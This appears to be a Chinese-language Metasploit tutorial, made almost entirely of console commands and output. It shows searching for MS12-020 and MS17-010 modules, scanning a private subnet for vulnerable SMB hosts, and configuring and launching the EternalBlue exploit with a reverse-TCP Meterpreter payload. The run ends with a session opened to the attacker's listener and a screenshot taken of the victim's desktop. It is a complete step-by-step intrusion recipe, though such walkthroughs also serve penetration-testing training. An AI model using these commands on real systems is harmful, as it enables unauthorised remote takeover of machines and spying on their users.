msf > search 12_020[!] Module database cache not built yet, using slow searchMatching Modules================ Name Disclosure Date Rank Deion ---- --------------- ---- ----------- auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal MS12-020 Microsoft Remote Desktop Use-After-Free DoS auxiliary/scanner/rdp/ms12_020_check normal MS12-020 Microsoft Remote Desktop Checker
使用该漏洞利用代码
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
查看使用方法
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name Current Setting Required Deion ---- --------------- -------- ----------- RHOST yes The target address RPORT 3389yes The target port (TCP)
search 17_010[!] Module database cachenot built yet, using slow searchMatching Modules================ Name Disclosure DateRank Deion ---- --------------- ---- ----------- auxiliary/admin/smb/ms17_010_command 2017-03-14normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_psexec 2017-03-14normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
检测内网中存在漏洞的主机系统
msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Deion ---- --------------- -------- ----------- CHECK_ARCH trueno Check for architecture on vulnerable hosts CHECK_DOPU trueno Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE falseno Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target address range or CIDR identifier RPORT 445yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1yes The number of concurrent threads msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.136.129/24 RHOSTS => 192.168.136.129/24 msf auxiliary(scanner/smb/smb_ms17_010) > exploit [*] Scanned 26of256 hosts (10% complete) [*] Scanned 52of256 hosts (20% complete) [*] Scanned 77of256 hosts (30% complete) [*] Scanned 103of256 hosts (40% complete) [*] Scanned 128of256 hosts (50% complete) [+] 192.168.136.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
加载攻击模块
msf auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalbluemsf exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Deion ---- --------------- -------- ----------- GroomAllocations 12yes Initial number of times to groom the kernel pool. GroomDelta 5yes The amount to increase the groom count by per try. MaxExploitAttempts 3yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST yes The target address RPORT 445yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch trueyes Check if remote architecture matches exploit Target. VerifyTarget trueyes Check if remote OS matches exploit Target.Exploit target: Id Name -- ---- 0 Windows 7and Server 2008 R2 (x64) All Service Packs
配置
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.136.129RHOST => 192.168.136.129msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.136.131LHOST => 192.168.136.131msf exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Deion ---- --------------- -------- ----------- GroomAllocations 12yes Initial number of times to groom the kernel pool. GroomDelta 5yes The amount to increase the groom count by per try. MaxExploitAttempts 3yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.136.129yes The target address RPORT 445yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch trueyes Check if remote architecture matches exploit Target. VerifyTarget trueyes Check if remote OS matches exploit Target.Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Deion ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.136.131yes The listen address LPORT 4444yes The listen portExploit target: Id Name -- ---- 0 Windows 7and Server 2008 R2 (x64) All Service Packs
发动攻击
msf exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on192.168.136.131:4444 [*] 192.168.136.129:445 - Connecting to target for exploitation.[+] 192.168.136.129:445 - Connection established for exploitation.[+] 192.168.136.129:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.136.129:445 - CORE raw buffer dump (53 bytes)[*] 192.168.136.129:445 - 0x00000000 5769 6e 64 6f 7773205365727665722032 Windows Server 2[*] 192.168.136.129:445 - 0x00000010 3030382052322045 6e 74657270726973008 R2 Enterpris[*] 192.168.136.129:445 - 0x00000020 65203736303120536572766963652050 e 7601 Service P[*] 192.168.136.129:445 - 0x00000030 6163 6b 2031 ack 1 [+] 192.168.136.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 192.168.136.129:445 - Trying exploit with 12 Groom Allocations.[*] 192.168.136.129:445 - Sending all but last fragment of exploit packet[*] 192.168.136.129:445 - Starting non-paged pool grooming[+] 192.168.136.129:445 - Sending SMBv2 buffers[+] 192.168.136.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.136.129:445 - Sending final SMBv2 buffers.[*] 192.168.136.129:445 - Sending last fragment of exploit packet![*] 192.168.136.129:445 - Receiving response from exploit packet[+] 192.168.136.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 192.168.136.129:445 - Sending egg to corrupted connection.[*] 192.168.136.129:445 - Triggering free of corrupted buffer.[*] Sending stage (206403 bytes) to 192.168.136.129[*] Meterpreter session 1 opened (192.168.136.131:4444 -> 192.168.136.129:49567) at 2018-04-3023:31:53 +0800[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
获取对方电脑桌面
meterpreter > screenshotScreenshot saved to: /root/VrBAGsTE.jpeg